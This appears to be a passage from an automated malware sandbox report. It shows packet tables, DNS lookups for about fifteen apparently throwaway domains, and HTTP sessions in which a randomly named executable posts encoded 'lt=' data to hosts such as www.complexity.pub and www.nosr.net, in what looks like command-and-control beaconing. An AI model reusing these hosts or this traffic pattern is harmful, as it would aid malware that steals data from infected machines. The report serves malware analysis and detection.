                        Sep 9, 2024 04:54:32.915872097 CEST4978480192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:32.967358112 CEST804978454.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:33.930567980 CEST4978580192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:33.935498953 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:33.935560942 CEST4978580192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:33.948301077 CEST4978580192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:33.953185081 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:33.953231096 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:33.953273058 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:33.953301907 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:33.953394890 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:33.953407049 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:33.953442097 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:33.953454018 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:33.953466892 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:35.459872007 CEST4978580192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:35.511369944 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:36.477085114 CEST4978680192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:36.482048035 CEST804978654.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:36.482122898 CEST4978680192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:36.489538908 CEST4978680192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:36.494334936 CEST804978654.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:50.210313082 CEST804978354.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:50.210375071 CEST4978380192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:52.757884979 CEST804978454.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:52.758059978 CEST4978480192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:55.324176073 CEST804978554.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:55.328025103 CEST4978580192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:57.868287086 CEST804978654.183.209.210192.168.2.4
                        Sep 9, 2024 04:54:57.868387938 CEST4978680192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:57.869805098 CEST4978680192.168.2.454.183.209.210
                        Sep 9, 2024 04:54:57.874557972 CEST804978654.183.209.210192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 9, 2024 04:51:32.562149048 CEST4993053192.168.2.41.1.1.1
                        Sep 9, 2024 04:51:32.789654970 CEST53499301.1.1.1192.168.2.4
                        Sep 9, 2024 04:51:48.508760929 CEST6534153192.168.2.41.1.1.1
                        Sep 9, 2024 04:51:48.593511105 CEST53653411.1.1.1192.168.2.4
                        Sep 9, 2024 04:51:56.649101019 CEST5105553192.168.2.41.1.1.1
                        Sep 9, 2024 04:51:56.676213026 CEST53510551.1.1.1192.168.2.4
                        Sep 9, 2024 04:52:09.992332935 CEST5645553192.168.2.41.1.1.1
                        Sep 9, 2024 04:52:10.098577023 CEST53564551.1.1.1192.168.2.4
                        Sep 9, 2024 04:52:23.555442095 CEST5730453192.168.2.41.1.1.1
                        Sep 9, 2024 04:52:23.972143888 CEST53573041.1.1.1192.168.2.4
                        Sep 9, 2024 04:52:37.587011099 CEST6318453192.168.2.41.1.1.1
                        Sep 9, 2024 04:52:37.955061913 CEST53631841.1.1.1192.168.2.4
                        Sep 9, 2024 04:52:51.367829084 CEST5326853192.168.2.41.1.1.1
                        Sep 9, 2024 04:52:51.379542112 CEST53532681.1.1.1192.168.2.4
                        Sep 9, 2024 04:53:04.555001020 CEST5139753192.168.2.41.1.1.1
                        Sep 9, 2024 04:53:04.566490889 CEST53513971.1.1.1192.168.2.4
                        Sep 9, 2024 04:53:17.711639881 CEST5916253192.168.2.41.1.1.1
                        Sep 9, 2024 04:53:17.725960016 CEST53591621.1.1.1192.168.2.4
                        Sep 9, 2024 04:53:31.041980982 CEST5111453192.168.2.41.1.1.1
                        Sep 9, 2024 04:53:31.355860949 CEST53511141.1.1.1192.168.2.4
                        Sep 9, 2024 04:53:44.915317059 CEST5742753192.168.2.41.1.1.1
                        Sep 9, 2024 04:53:44.925144911 CEST53574271.1.1.1192.168.2.4
                        Sep 9, 2024 04:53:52.994842052 CEST5549253192.168.2.41.1.1.1
                        Sep 9, 2024 04:53:53.450860023 CEST53554921.1.1.1192.168.2.4
                        Sep 9, 2024 04:54:07.040254116 CEST6287353192.168.2.41.1.1.1
                        Sep 9, 2024 04:54:07.050709009 CEST53628731.1.1.1192.168.2.4
                        Sep 9, 2024 04:54:15.118418932 CEST6548053192.168.2.41.1.1.1
                        Sep 9, 2024 04:54:15.587093115 CEST53654801.1.1.1192.168.2.4
                        Sep 9, 2024 04:54:28.821854115 CEST5323253192.168.2.41.1.1.1
                        Sep 9, 2024 04:54:28.832668066 CEST53532321.1.1.1192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Sep 9, 2024 04:51:32.562149048 CEST192.168.2.41.1.1.10x4e83Standard query (0)www.nosr.netA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:51:48.508760929 CEST192.168.2.41.1.1.10x2e9fStandard query (0)www.monos.shopA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:51:56.649101019 CEST192.168.2.41.1.1.10xc057Standard query (0)www.complexity.pubA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:09.992332935 CEST192.168.2.41.1.1.10x1222Standard query (0)www.nevsehir-nakliyat.xyzA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:23.555442095 CEST192.168.2.41.1.1.10xc907Standard query (0)www.masteriocp.onlineA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:37.587011099 CEST192.168.2.41.1.1.10xb631Standard query (0)www.kryto.topA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:51.367829084 CEST192.168.2.41.1.1.10xc14eStandard query (0)www.angelenterprise.bizA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:04.555001020 CEST192.168.2.41.1.1.10x323fStandard query (0)www.dyme.techA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:17.711639881 CEST192.168.2.41.1.1.10x6371Standard query (0)www.lilibetmed.onlineA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:31.041980982 CEST192.168.2.41.1.1.10x3109Standard query (0)www.mbwd.storeA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:44.915317059 CEST192.168.2.41.1.1.10xc7aStandard query (0)www.terrearcenciel.onlineA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:52.994842052 CEST192.168.2.41.1.1.10x1f60Standard query (0)www.fvti.cloudA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:54:07.040254116 CEST192.168.2.41.1.1.10x191fStandard query (0)www.theaji.shopA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:54:15.118418932 CEST192.168.2.41.1.1.10x86fdStandard query (0)www.sorriragora.onlineA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:54:28.821854115 CEST192.168.2.41.1.1.10x9c2aStandard query (0)www.jyourwd.storeA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Sep 9, 2024 04:51:32.789654970 CEST1.1.1.1192.168.2.40x4e83No error (0)www.nosr.netnosr.netCNAME (Canonical name)IN (0x0001)false
                        Sep 9, 2024 04:51:32.789654970 CEST1.1.1.1192.168.2.40x4e83No error (0)nosr.net82.221.128.183A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:51:48.593511105 CEST1.1.1.1192.168.2.40x2e9fName error (3)www.monos.shopnonenoneA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:51:56.676213026 CEST1.1.1.1192.168.2.40xc057No error (0)www.complexity.pub217.160.0.127A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:10.098577023 CEST1.1.1.1192.168.2.40x1222No error (0)www.nevsehir-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                        Sep 9, 2024 04:52:10.098577023 CEST1.1.1.1192.168.2.40x1222No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                        Sep 9, 2024 04:52:10.098577023 CEST1.1.1.1192.168.2.40x1222No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:23.972143888 CEST1.1.1.1192.168.2.40xc907No error (0)www.masteriocp.onlinedns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                        Sep 9, 2024 04:52:23.972143888 CEST1.1.1.1192.168.2.40xc907No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:23.972143888 CEST1.1.1.1192.168.2.40xc907No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:23.972143888 CEST1.1.1.1192.168.2.40xc907No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:37.955061913 CEST1.1.1.1192.168.2.40xb631No error (0)www.kryto.top162.0.213.94A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:51.379542112 CEST1.1.1.1192.168.2.40xc14eNo error (0)www.angelenterprise.bizangelenterprise.bizCNAME (Canonical name)IN (0x0001)false
                        Sep 9, 2024 04:52:51.379542112 CEST1.1.1.1192.168.2.40xc14eNo error (0)angelenterprise.biz3.33.130.190A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:52:51.379542112 CEST1.1.1.1192.168.2.40xc14eNo error (0)angelenterprise.biz15.197.148.33A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:04.566490889 CEST1.1.1.1192.168.2.40x323fNo error (0)www.dyme.tech13.248.169.48A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:04.566490889 CEST1.1.1.1192.168.2.40x323fNo error (0)www.dyme.tech76.223.54.146A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:17.725960016 CEST1.1.1.1192.168.2.40x6371No error (0)www.lilibetmed.online185.134.245.113A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:31.355860949 CEST1.1.1.1192.168.2.40x3109No error (0)www.mbwd.store103.42.108.46A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:44.925144911 CEST1.1.1.1192.168.2.40xc7aName error (3)www.terrearcenciel.onlinenonenoneA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:53:53.450860023 CEST1.1.1.1192.168.2.40x1f60No error (0)www.fvti.cloud38.55.112.70A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:54:07.050709009 CEST1.1.1.1192.168.2.40x191fName error (3)www.theaji.shopnonenoneA (IP address)IN (0x0001)false
                        Sep 9, 2024 04:54:15.587093115 CEST1.1.1.1192.168.2.40x86fdNo error (0)www.sorriragora.onlinesorriragora.onlineCNAME (Canonical name)IN (0x0001)false
                        Sep 9, 2024 04:54:15.587093115 CEST1.1.1.1192.168.2.40x86fdNo error (0)sorriragora.online162.240.81.18A (IP address)IN (0x0001)false
                        Sep 9, 2024 04:54:28.832668066 CEST1.1.1.1192.168.2.40x9c2aNo error (0)www.jyourwd.store54.183.209.210A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • www.nosr.net
                        • www.complexity.pub
                        • www.nevsehir-nakliyat.xyz
                        • www.masteriocp.online
                        • www.kryto.top
                        • www.angelenterprise.biz
                        • www.dyme.tech
                        • www.lilibetmed.online
                        • www.mbwd.store
                        • www.fvti.cloud
                        • www.sorriragora.online
                        • www.jyourwd.store

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.44974182.221.128.183802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:51:32.806587934 CEST489OUTGET /ujbu/?lt=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=&3ry=nj20Xr HTTP/1.1
                        Host: www.nosr.net
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:51:33.457263947 CEST1236INHTTP/1.1 404 Not Found
                        Date: Mon, 09 Sep 2024 02:51:29 GMT
                        Server: Apache
                        Accept-Ranges: bytes
                        Cache-Control: no-cache, no-store, must-revalidate
                        Pragma: no-cache
                        Expires: 0
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html
                        Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                        Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                        Sep 9, 2024 04:51:33.457279921 CEST1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                        Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                        Sep 9, 2024 04:51:33.457324982 CEST1236INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                        Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                        Sep 9, 2024 04:51:33.457340002 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                        Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                        Sep 9, 2024 04:51:33.457354069 CEST896INData Raw: 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f 5a 33 79 43 72 32 55 74 69 49 6e 71 45 66 74 6a 33 69 4c 4d 31 38 41 66 73 75 2f 78 4b 76 39 42 34 51 55 7a 73
                        Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                        Sep 9, 2024 04:51:33.457365036 CEST1236INData Raw: 49 39 63 63 48 52 43 64 78 55 65 59 61 6e 46 70 51 4a 4d 42 55 44 49 46 78 77 31 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c
                        Data Ascii: I9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvN
                        Sep 9, 2024 04:51:33.457386971 CEST1236INData Raw: 33 51 46 59 51 49 52 63 49 33 43 71 32 5a 4e 6b 33 74 59 64 75 75 6e 50 78 49 70 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56
                        Data Ascii: 3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFl
                        Sep 9, 2024 04:51:33.457397938 CEST448INData Raw: 62 63 6e 78 70 68 49 45 50 50 6e 68 58 63 39 58 6b 52 4e 75 48 68 33 43 77 38 4a 58 74 65 65 43 56 37 5a 6a 67 2f 77 75 61 38 59 47 6c 33 58 76 44 55 50 79 2f 63 2f 41 76 64 34 2f 68 4e 44 53 71 65 67 51 41 41 41 41 42 4a 52 55 35 45 72 6b 4a 67
                        Data Ascii: bcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code { font-size: 900%; }
                        Sep 9, 2024 04:51:33.457487106 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 0d 0a 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73
                        Data Ascii: <span class="status-code">37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 1f
                        Sep 9, 2024 04:51:33.457524061 CEST748INData Raw: 46 51 48 31 6d 43 38 38 3d 26 61 6d 70 3b 33 72 79 3d 6e 6a 32 30 58 72 20 28 70 6f 72 74 20 0d 0a 32 0d 0a 38 30 0d 0a 37 33 0d 0a 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20
                        Data Ascii: FQH1mC88=&amp;3ry=nj20Xr (port 28073) </div> </li> <li class="info-server">107</li> </ul> </div> </div>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.449743217.160.0.127802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:51:56.694547892 CEST768OUTPOST /4c7j/ HTTP/1.1
                        Host: www.complexity.pub
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.complexity.pub
                        Referer: http://www.complexity.pub/4c7j/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6e 77 30 41 31 53 68 69 73 6e 76 6f 56 6e 56 67 38 32 55 30 36 34 55 31 46 35 65 5a 46 41 47 75 44 78 78 53 6c 43 6c 54 48 5a 61 6f 35 6c 63 69 48 39 4a 54 49 69 6f 76 64 72 6d 64 77 55 79 31 6c 47 6c 6c 38 30 71 37 32 30 5a 68 70 4d 61 6f 69 50 6b 50 31 4e 48 73 41 39 58 42 4b 62 43 76 71 59 2f 78 78 46 33 49 51 68 4e 37 2b 5a 45 64 73 42 51 2b 38 2b 6c 79 41 7a 35 71 45 44 4a 4f 73 48 72 38 4a 52 66 63 52 70 50 4f 33 33 68 6e 4e 52 49 35 44 4c 41 77 52 66 78 61 6d 63 7a 71 61 4b 51 64 6f 2f 4c 36 73 31 6c 36 58 59 75 57 71 69 53 6b 4d 41 3d 3d
                        Data Ascii: lt=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DLAwRfxamczqaKQdo/L6s1l6XYuWqiSkMA==
                        Sep 9, 2024 04:51:57.333204031 CEST558INHTTP/1.1 404 Not Found
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Date: Mon, 09 Sep 2024 02:51:57 GMT
                        Server: Apache
                        Content-Encoding: gzip
                        Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                        Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.449744217.160.0.127802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:51:59.241091967 CEST788OUTPOST /4c7j/ HTTP/1.1
                        Host: www.complexity.pub
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.complexity.pub
                        Referer: http://www.complexity.pub/4c7j/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6d 51 6b 41 33 31 39 69 6b 6e 76 72 51 6e 56 67 6c 6d 55 77 36 34 49 31 46 34 71 4a 45 30 71 75 44 51 42 53 6b 47 4a 54 47 5a 61 6f 7a 46 63 6a 4a 64 49 64 49 69 6b 52 64 75 4f 64 77 55 32 31 6c 47 31 6c 38 48 53 36 33 6b 5a 6a 68 73 61 6d 74 76 6b 50 31 4e 48 73 41 39 72 72 4b 62 71 76 71 73 44 78 79 6b 33 50 5a 42 4e 36 32 35 45 64 6d 68 51 79 38 2b 6c 41 41 33 35 51 45 41 39 4f 73 46 7a 38 48 6b 2f 66 49 5a 50 55 6f 6e 67 73 4b 42 4a 71 45 71 77 34 52 74 70 70 68 74 57 50 66 4d 42 48 35 4f 71 74 2b 31 42 4a 4b 66 6e 69 6e 68 76 74 58 4e 74 71 67 32 42 37 48 67 66 62 75 64 30 62 55 71 4a 53 41 2f 4d 3d
                        Data Ascii: lt=spsn588TGAkFmQkA319iknvrQnVglmUw64I1F4qJE0quDQBSkGJTGZaozFcjJdIdIikRduOdwU21lG1l8HS63kZjhsamtvkP1NHsA9rrKbqvqsDxyk3PZBN625EdmhQy8+lAA35QEA9OsFz8Hk/fIZPUongsKBJqEqw4RtpphtWPfMBH5Oqt+1BJKfninhvtXNtqg2B7Hgfbud0bUqJSA/M=
                        Sep 9, 2024 04:51:59.892699003 CEST558INHTTP/1.1 404 Not Found
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Date: Mon, 09 Sep 2024 02:51:59 GMT
                        Server: Apache
                        Content-Encoding: gzip
